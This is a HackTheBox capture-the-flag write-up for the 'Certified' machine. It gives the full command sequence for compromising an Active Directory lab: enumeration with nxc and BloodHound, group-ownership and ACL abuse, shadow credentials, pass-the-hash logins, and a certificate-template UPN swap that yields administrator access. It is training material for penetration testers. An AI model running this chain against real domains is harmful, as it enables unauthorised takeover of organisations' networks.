Certified HTB Writeup | HacktheBox
Achieved a full compromise of the Certified machine, demonstrating the power of leveraging misconfigurations and services in AD environments. This walkthrough is now live on my website, where I detail the entire process step-by-step to help others understand and replicate similar scenarios during penetration testing. Check it out to learn practical techniques and sharpen your skills!
2024-12-14 03:44:07 - xone
Initial Scenario
We begin the engagement with valid credentials for the user Judith Mader in the domain certified.htb. These were obtained from an earlier stage of the assessment:
Username: judith.mader
Password: judith09
User Account: judith.mader (Low privilege)
Target: Escalate privileges to root on the machine.
Tools Utilized: nxc, bloodyAD, dacledit.py, pywhisker, Impacket scripts, and certipy.
Enumeration
Nmap Scan
An initial Nmap scan revealed several open ports on the domain controller (DC01):
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-22 17:02:33Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP over SSL 3268/tcp open ldap Microsoft Global Catalog 3269/tcp open ssl/ldap Microsoft Global Catalog over SSL 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing
Key observations:
Active Directory Indicators: Ports 88 (Kerberos), 389 (LDAP), and 445 (SMB) suggest the presence of a Windows domain controller.
SSL Certificates: The certificate details revealed the hostname DC01.certified.htb and additional domain information, confirming the target's role as a certificate authority.
SMB Signing: Nmap scripts indicated SMB signing is enabled and required, which may limit some SMB attack vectors.
Testing SMB Login
With the obtained credentials, SMB authentication was tested using nxc:
nxc smb $IP -u 'judith.mader' -p 'judith09'
Output:
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
The credentials were successfully authenticated against the SMB service, confirming low-privilege access to the domain.
LDAP Enumeration with BloodHound
To map the domain structure and discover potential attack paths, LDAP enumeration was conducted using nxc with BloodHound collection enabled:
nxc ldap dc01.certified.htb -u judith.mader -p judith09 --bloodhound --collection All --dns-tcp --dns-server 10.10.11.41
Output:
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09 LDAP 10.10.11.41 389 DC01 Resolved collection methods: objectprops, session, localadmin, dcom, trusts, rdp, container, psremote, acl, group LDAP 10.10.11.41 389 DC01 Done in 00M 33S LDAP 10.10.11.41 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.41_2024-11-22_054454_bloodhound.zip
The output was successfully collected and compressed into a ZIP file, ready for BloodHound analysis.
BloodHound Analysis
The BloodHound graph revealed several key attack paths within the Active Directory environment:
- Judith Mader's Permissions:
- Judith Mader has WriteOwner permissions on the Management group.
- Service Account (Management_SVC):
- The Management_SVC account has GenericWrite permissions over the Management group.
- CA_Operator Privilege:
- The Management_SVC account has GenericAll permissions over the CA_Operator user.
User Privilege Escalation
1. Data Collection with nxc
- Action: Enumerated Active Directory data and found that judith.mader could modify the “Management” group.
- Details: Used BloodHound to analyze the data collected by nxc.
2. Setting Ownership
Used bloodyAD to set judith.mader as the owner of the “Management” group:
bloodyAD --host "$IP" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
3. Granting Write Permissions
Updated the group permissions with dacledit.py:
python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
4. Adding to Management Group
Added judith.mader to the “Management” group:
bloodyAD --host $IP -d 'certified.htb' -u 'judith.mader' -p 'judith09' add groupMember "Management" "judith.mader"
5. Exploiting KeyCredentialLink
Used pywhisker to create a certificate for management_svc:
python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add
6. Obtaining a TGT
Generated a Kerberos TGT for management_svc:
python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx /home/kali/HTB/Certified/pywhisker/pywhisker/loa78u6G.pfx -pfx-pass 2v752WSk3p8VJ1rYuYXT fuck.ccache
7. Recovering NT Hash
Extracted NT hash for management_svc using gettgtpkinit.py:
python3 getnthash.py certified.htb/management_svc -key XXXXXXX41f6e9b55f2ce52b9922f38bff7e293ac3989a0XXXXXXXXXXXX
8. Logging in with Evil-WinRM
Logged in as management_svc with Evil-WinRM:
evil-winrm -i $IP -u management_svc -H $NT-Hash #Use NT Hash
Root Privilege Escalation
1. Identifying GenericAll Rights
Discovered that management_svc had GenericAll rights over ca_operator.
2. Adding KeyCredential
Used certipy-ad to modify ca_operator KeyCredential:
certipy-ad shadow auto -u management_svc@certified.htb -hashes $NT-Hash -account ca_operator
3. Updating UPN of ca_operator
Updated the UPN (UserPrincipalName) of ca_operator to administrator:
certipy-ad account update -u management_svc@certified.htb -hashes $NT-Hash -user ca_operator -upn administrator
4. Requesting Administrator Certificate
Requested a certificate for the administrator account using certipy-ad:
certipy-ad req -username ca_operator@certified.htb -hashes $NT-Hash -ca certified-DC01-CA -template CertifiedAuthentication
5. Restoring Original UPN
Restored ca_operator’s UPN to its original value:
certipy-ad account update -u management_svc@certified.htb -hashes $NT-Hash -user ca_operator -upn ca_operator@certified.htb
6. Obtaining Administrator TGT
Authenticated as administrator with the new certificate:
certipy-ad auth -pfx administrator.pfx -domain certified.htb
7. Logging in as Administrator
Logged in with Evil-WinRM as administrator:
evil-winrm -u administrator -H $NT-Hash-1 -i $IP
Summary
- Key Steps:
- Abused AD misconfigurations to escalate privileges.
- Exploited certificate services to gain access to the administrator account.
Result: Full compromise of the Certified machine.